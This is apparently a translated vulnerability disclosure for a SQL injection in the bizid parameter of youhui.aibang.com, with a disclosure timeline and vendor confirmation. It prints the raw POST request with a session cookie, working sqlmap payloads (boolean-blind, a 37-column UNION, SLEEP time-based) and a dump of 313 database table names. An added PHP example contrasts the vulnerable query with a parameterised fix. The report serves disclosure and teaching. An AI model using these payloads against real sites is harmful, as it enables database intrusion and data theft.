2015-05-01: Details reported to the vendor; awaiting the vendor's response
2015-05-05: Vendor has confirmed; details disclosed to the vendor only
2015-05-15: Details disclosed to core white hats and experts in the relevant field
2015-05-25: Details disclosed to regular white hats
2015-06-04: Details disclosed to intern white hats
2015-06-19: Details disclosed to the public
http://youhui.aibang.com/
The original request actually has the format shown below, but it does not work as a GET, so the only option was to convert it into a POST submission:
The converted request:
POST /? HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://youhui.aibang.com/
Cookie: mid=39; PHPSESSID=71450d98f1d11ba4fde2d0550cbd0cf1; fid=--1430458512--17519120718969; city=%E4%B8%8A%E6%B5%B7
Host: youhui.aibang.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
Content-Length: 4

area=discount&bizid=112021&cmd=getextralist&page=2&tid=2943273
Blind injection in the bizid parameter:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: bizid
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: area=discount&bizid=112021 AND 3745=3745&cmd=getextralist&page=2&tid=2943273

    Type: UNION query
    Title: MySQL UNION query (NULL) - 37 columns
    Payload: area=discount&bizid=112021 UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,CONCAT(0x7173707271,0x47554779486a41526b6e,0x7162646671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&cmd=getextralist&page=2&tid=2943273

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: area=discount&bizid=112021 AND SLEEP(5)&cmd=getextralist&page=2&tid=2943273
---
web application technology: PHP 5.2.3, Apache 2.2.4
back-end DBMS: MySQL 5.0.11
Database: abpaid
[313 tables]
+---------------------------------+
| ABFunc |
| ABLog |
| ABRole |
| ABRoleFunc |
| ABScore |
| ABScoreHistory |
| ABShowTemplates |
| ABUser |
| AdvIndex |
| AdvInfo |
| AdvPos |
| AdvPosInfo |
| Adv_Contract |
| Adv_Email |
| Adv_EmailMap |
| Adv_Matter |
| Adv_MatterLog |
| Adv_Matter_BaiduListener |
| AlarmSetting |
| BizBindWeibo |
| BizCategory |
| BizInfo |
| BizSuggest |
| Category |
| CityPayRatio |
| ClientActive |
| ClientVersion |
| FriendLink |
| HasYhqPaidBizSortPlan |
| Hotspots |
| KeywordPayRatio |
| KeywordRetView |
| KeywordSuggestion |
| KeywordWhiteList |
| KuaiQianRecvLog |
| KuaiQianSendLog |
| MallProductNewAuto |
| MallProductPlanAuto |
| OftenReplay |
| OrderTask |
| OrderTaskOrderQueue |
| OrderTaskRecord |
| PPC_AB_Union_TelMap |
| PPC_BizAccount |
| PPC_BizAdv |
| PPC_BizAppealCallMap |
| PPC_BizBaseInfo |
| PPC_BizBlackCallMap |
| PPC_BizCallLog |
| PPC_BizExtraInfo |
| PPC_BizNewTel |
| PPC_BizPrice |
| PPC_BizSmsTelMap |
| PPC_BizTel |
| PPC_BizTelBindMap |
| PPC_BizTelBindMap_bak |
| PPC_BizTel_bak |
| PPC_Black |
| PPC_CallPrice |
| PPC_CallRecord |
| PPC_CardGroup |
| PPC_ConsumptionRecord |
| PPC_Contract |
| PPC_League |
| PPC_LeagueCommissionRecord |
| PPC_LostOriginCallRecord |
| PPC_OriginCallRecord |
| PPC_RechargeCard |
| PPC_RechargeRecord |
| PPC_ShowInitTabSets |
| PPC_ShowTab |
| PPC_ShowTabItem |
| PPC_TEL_BACK_OP_MAP |
| PPC_TEL_BACK_OP_MAP_bak |
| PPC_Tel |
| PPC_UnionFinance |
| PaidBiz |
| PaidBizInfoExtra |
| PaidBizShare |
| PaidBizShareSns |
| PaidBizSns |
| PaidBizTemplateSets |
| PaidBiz_Discount_Cate_Map |
| PaidBiz_ParentDiscount_City_Map |
| PaidContentVector |
| PaidContentVector2 |
| PaidContentVector_1 |
| PaidDiscountHistory |
| PaidInclusionYearPrice |
| PaidKeywordsForSearch |
| PaidMessage |
| PaidPlacementPlan |
| PaidProduct |
| PaidProduct2 |
| PaidProductInfo |
| PaidProductInfo2 |
| PaidProduct_bak |
| PaidThread |
| PaidThread_bak |
| Paid_Youhui_Spatial |
| PlanDetailsInfos |
| PlanKeywords |
| PlanPay |
| PpccAlarmLog |
| PpccBiz |
| PpccBizPaymentRecord |
| PpccCategory |
| PpccContract |
| PpccKeycatemap |
| PpccKeyword |
| PpccKeywordSugg |
| PpccOnlineProcess |
| PpccPlan |
| PpccPlanCateMap |
| PromotionMsg |
| PublicNotice |
| QQTuanBGData |
| QQTuanCouponMap |
| QQTuanPayTask |
| QWT_BizDeviceToken |
| QWT_BizDeviceTokenAndroid |
| RankStatusView |
| Regions |
| RegionsPayRatio |
| SequencePayRatio |
| SysMsg |
| SystemConfig |
| TmpPlan |
| TmpPlanKeywords |
| TmpPlanPay |
| ToolUniqueId |
| TuanAdEmailSub |
| TuanAddTuanBizInfo |
| TuanAgent |
| TuanAgentAccount |
| TuanAgentAccountLog |
| TuanAgentExpenseDeduction |
| TuanAgentRecharge |
| TuanAppraiser |
| TuanApprkx |
| TuanAwardee |
| TuanBiz2Tuan |
| TuanBizMarketTabSets |
| TuanBizQuan |
| TuanBizQuanMap |
| TuanCPS |
| TuanCPSClick |
| TuanCPSInfo |
| TuanCPSOrder |
| TuanCate |
| TuanChannel |
| TuanChannelProductRate |
| TuanCharge |
| TuanCityArea |
| TuanCommonQuestion |
| TuanContact |
| TuanCoopErrorLog |
| TuanCoopOrderSync |
| TuanCoopProBiz |
| TuanCoopProBiz_bak |
| TuanCoopProDesc |
| TuanCoopProDesc_bak |
| TuanCoopProPlan |
| TuanCoopProPlan_bak |
| TuanCoopProduct |
| TuanCoopProductJumpLog |
| TuanCoopProductMap |
| TuanCoopProductPics |
| TuanCoopProductPush |
| TuanCoopProduct_bak |
| TuanCoupon |
| TuanCouponList |
| TuanCouponSendSMSLog |
| TuanDeliver |
| TuanDisplayProductCities |
| TuanEmailNoticeList |
| TuanFrmCate |
| TuanFrmChannel |
| TuanFrmClick |
| TuanFrmLog |
| TuanGift |
| TuanInvestigation |
| TuanInvestigationOther |
| TuanInviteClick |
| TuanInviteReg |
| TuanKingdeeAgent |
| TuanKingdeeBiz |
| TuanKingdeeCity |
| TuanKingdeeClerk |
| TuanLotteryAwardee |
| TuanLotteryClick |
| TuanLotteryCoupon |
| TuanLotteryPrize |
| TuanMallAd |
| TuanOrder |
| TuanOrderAttrMap |
| TuanOrderRefund |
| TuanPayPeriods |
| TuanPayPlan |
| TuanPayPlanDetail |
| TuanPaySubmitLog |
| TuanPost |
| TuanPresent |
| TuanPresentAttachHistory |
| TuanPresentCode |
| TuanPresentLog |
| TuanProduct |
| TuanProductAttr |
| TuanProductAuditLog |
| TuanProductBiz |
| TuanProductBizAccount |
| TuanProductDesc |
| TuanProductLimit |
| TuanProductLimitAttrMap |
| TuanProductPlan |
| TuanProductSendAccount |
| TuanProductSpec |
| TuanProductSpecAttrMap |
| TuanQQCBOrder |
| TuanQuestion |
| TuanRefundOrderAuditRecords |
| TuanRefundOrderAuditStatus |
| TuanSNS |
| TuanSNSalipay |
| TuanSNSkaixin001 |
| TuanSNSnetease163 |
| TuanSNSqi360 |
| TuanSNSsina |
| TuanSpecialMarket |
| TuanSpecialMarketOnlineMap |
| TuanSpecialMarketProMap |
| TuanStar |
| TuanSubCate |
| TuanThread |
| TuanUserAccountLog |
| TuanUserAddr |
| TuanUserInfo |
| TuanUserPhoneSns |
| TuanUserRecommendRelation |
| TuanUserRecommendRelationBackup |
| UserDefinedTab |
| UserDefinedTabContent |
| UserDefinedTabSchema |
| UserDefinedTabSubList |
| UserMsg |
| UserQuestions |
| WdePaidBiz |
| WdePaidBizComment |
| WdePaidBizDiscount |
| WdePaidBizProduct |
| WedAct |
| WedActorInfo |
| WtuanSrv |
| XBizCustomInfo |
| XBizTopic |
| XDiscount |
| XDiscountCate |
| XDiscountRecord |
| XDiscount_bak |
| XManageComment |
| XProductCateMap |
| XProductCateMap2 |
| XProductCategory |
| XProductCategory2 |
| XProductComment |
| XQQOnline |
| XSecondaryDomain |
| XTabAccess |
| XVideo |
| XVideoSite |
| YouhuiBrandBiz |
| YoujuSortDefault |
| YoujuSortRule |
| YoujuSortSpecial |
| ZhiFuAlipayMsgLog |
| ZhiFuAlipayTradeLog |
| ZhiFuCmbcMsgLog |
| ZhiFuCmbcTradeLog |
| ZhiFuDnapayMsgLog |
| ZhiFuDnapayTradeLog |
| ZhiFuTenpayMsgLog |
| ZhiFuTenpayTradeLog |
| ZhiFuWYBRecvLog |
| ZhiFuWYBSendLog |
| ZhiFuWYRecvlog |
| ZhiFuWYSendlog |
| ZhiFuWapTenpayMsgLog |
| ZhiFuWapTenpayTradeLog |
| _paidForSearch |
| ab_top_adv |
| bid_index |
| bid_pids |
| bizActionLog |
| bizVisitHistory |
| biz_show_item |
| deal |
| detail_info_adv |
| errorlog |
| h5_abshow_bannerpic |
| h5_abshow_templates |
| h5_give_discount |
| index_pids |
| ip_tbl |
| methodlog |
| plan |
| plan_pic |
| plandesc |
| seo_biz_area_district_map |
| seo_biz_detail |
| seo_biz_page |
| show_adv |
| tmpCp |
| virtual_user |
+---------------------------------+
With this many tables, just pick any one and pull a bit of data~
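All three sqlmap findings above (boolean-based, UNION with 37 columns, time-based SLEEP) share one root cause: the numeric bizid value from the POST body reaches the MySQL query as text. The following is an added example written for this page, not code from aibang.com or from the report; the table name discount_extra, its columns, the page size of 20 and the PDO connection details are assumptions made for illustration. It shows the shape of handler that produces such a finding beside a hardened version that rejects anything that is not a plain integer and binds the value as a parameter.

```php
<?php
// Added example (not the site's code). Assumed schema: table `discount_extra`
// with columns `id`, `bizid`, `title`; assumed request shape from the report
// (POST area=discount&bizid=112021&cmd=getextralist&page=2).

function connect(): PDO {
    // Connection details are placeholders. Native prepares are enabled so the
    // driver, not string substitution, separates SQL from data.
    return new PDO('mysql:host=127.0.0.1;dbname=abpaid;charset=utf8', 'app', 'secret', [
        PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES   => false,
    ]);
}

// Pattern that yields the sqlmap result above: bizid is interpolated verbatim,
// so "112021 AND 3745=3745", "112021 UNION ALL SELECT ..." and
// "112021 AND SLEEP(5)" all become part of the SQL text.
function getExtraListUnsafe(PDO $pdo, array $post): array {
    $bizid  = $post['bizid'];
    $page   = $post['page'];
    $offset = ($page - 1) * 20;
    $sql = "SELECT id, bizid, title FROM discount_extra WHERE bizid = $bizid LIMIT $offset, 20";
    return $pdo->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened version: strict integer validation (rejects every payload shown in
// the report, since none of them is a bare integer), then a bound parameter.
function getExtraList(PDO $pdo, array $post): array {
    $rawBizid = isset($post['bizid']) ? $post['bizid'] : null;
    $rawPage  = isset($post['page'])  ? $post['page']  : '1';

    $bizid = filter_var($rawBizid, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    $page  = filter_var($rawPage,  FILTER_VALIDATE_INT, ['options' => ['min_range' => 1, 'max_range' => 10000]]);

    if ($bizid === false || $page === false) {
        // Reject instead of coercing: a non-integer bizid on this endpoint is
        // either a client bug or probing, and the log line is the detection signal.
        error_log('getextralist: rejected parameters ' . json_encode(['bizid' => $rawBizid, 'page' => $rawPage]));
        header('HTTP/1.1 400 Bad Request');
        return [];
    }

    $stmt = $pdo->prepare(
        'SELECT id, bizid, title FROM discount_extra WHERE bizid = :bizid LIMIT :offset, :limit'
    );
    $stmt->bindValue(':bizid',  $bizid,            PDO::PARAM_INT);
    $stmt->bindValue(':offset', ($page - 1) * 20,  PDO::PARAM_INT);
    $stmt->bindValue(':limit',  20,                PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Usage (inside the request handler):
// $rows = getExtraList(connect(), $_POST);
// echo json_encode($rows);
```

Two details matter for the UNION finding in particular: the query selects only the columns the response needs rather than `SELECT *` over a 37-column row, and the LIMIT values are bound as PDO::PARAM_INT with prepare emulation turned off, which is what lets MySQL accept placeholders in the LIMIT clause. With the integer check in front, the 400 response plus the error_log entry gives the operations side a concrete event to alert on whenever a scanner or a hand-crafted request sends something other than a number in bizid.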
Severity: High
Vulnerability Rank: 13
Confirmation time: 2015-05-05 20:11
The vulnerability exists, thank you.
None yet